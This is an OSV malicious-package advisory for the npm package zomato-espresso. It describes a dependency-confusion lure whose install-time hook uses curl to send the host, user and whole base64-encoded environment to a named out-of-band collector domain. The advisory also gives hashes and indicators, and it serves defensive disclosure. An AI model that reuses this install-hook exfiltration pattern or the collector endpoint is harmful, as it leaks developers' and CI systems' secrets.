MAL-2026-6269

See a problem?

Import Source

https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/zomato-espresso/MAL-2026-6269.json

JSON Data

https://api.osv.dev/v1/vulns/MAL-2026-6269

Published

2026-06-22T17:42:29Z

Modified

2026-06-22T18:31:22.528932473Z

Summary

Malicious code in zomato-espresso (npm)

Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (860464bbcd3d56375d93025e494e39a6652bb7d115fb581ee088474a66786c3d)

Package is a dependency-confusion lure targeting Zomato's internal namespace. package.json declares a preinstall hook that runs curl on every npm install, posting the installer's hostname (hostname -f), username (whoami), current working directory, and the entire process environment (base64-encoded via env | base64 -w0) over plain HTTP to an interactsh out-of-band collector at d8s0b82plbq3u5sb2vo0sb3a9obr4yjt7.oast.site. The URL path embeds the package name and the form fields exfiltrate host, user, cwd, and env, so any CI/developer environment that misresolves Zomato's internal package name to this public release leaks AWS keys, GITHUBTOKEN, NPMTOKEN, and any other secrets exposed in the environment. A preuninstall hook performs a similar host beacon. The package's own functionality is a stub (index.js exports only {name, version}); its sole purpose is the install-time beacon. The description string self-identifies as Zomato's PDF generator service, confirming the dependency-confusion reconnaissance intent against Zomato's private namespace.

Database specific

{
    "malicious-packages-origins": [
        {
            "sha256": "860464bbcd3d56375d93025e494e39a6652bb7d115fb581ee088474a66786c3d",
            "versions": [
                "1.0.0"
            ],
            "source": "amazon-inspector",
            "modified_time": "2026-06-22T17:42:29Z",
            "id": "IN-MAL-2026-007146",
            "import_time": "2026-06-22T18:25:28.677729129Z"
        }
    ]
}

References

https://www.npmjs.com/package/zomato-espresso/v/1.0.0

Credits

- Amazon Inspector - FINDER
- - inspector-research@amazon.com

Affected packages

npm / zomato-espresso

Package

Name: zomato-espresso; View open source insights on deps.dev
Purl: pkg:npm/zomato-espresso

Affected ranges

Affected versions

1.*

1.0.0

Database specific

source

"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/zomato-espresso/MAL-2026-6269.json"

indicators

{
    "package_integrity": [
        {
            "filename": "zomato-espresso-1.0.0.tgz",
            "hashes": {
                "sha512_sri": "sha512-BIRziNuUMjKSW0e44vroWYzIF+eT8Xyw5TGxF7saZY+8GTW1xe9l/XTGhVVoFGYm+fJCmLlCDlRnTs7YCDrCUQ==",
                "sha1": "3a20e29cf15bc9de0be4b3058bfe93637a079373"
            }
        }
    ],
    "evidence_files": [
        {
            "sha256": "f497ff339e6710b89864370f98cf6dcefb324083a49d25dceeed6a90f19820be",
            "tlsh": "2c01c934b8b496333d8c0370be6600293c722f4f82352c504adb091d838f215267da33",
            "path": "package.json"
        }
    ]
}

cwes

[
    {
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506",
        "description": "The product contains code that appears to be malicious in nature."
    }
]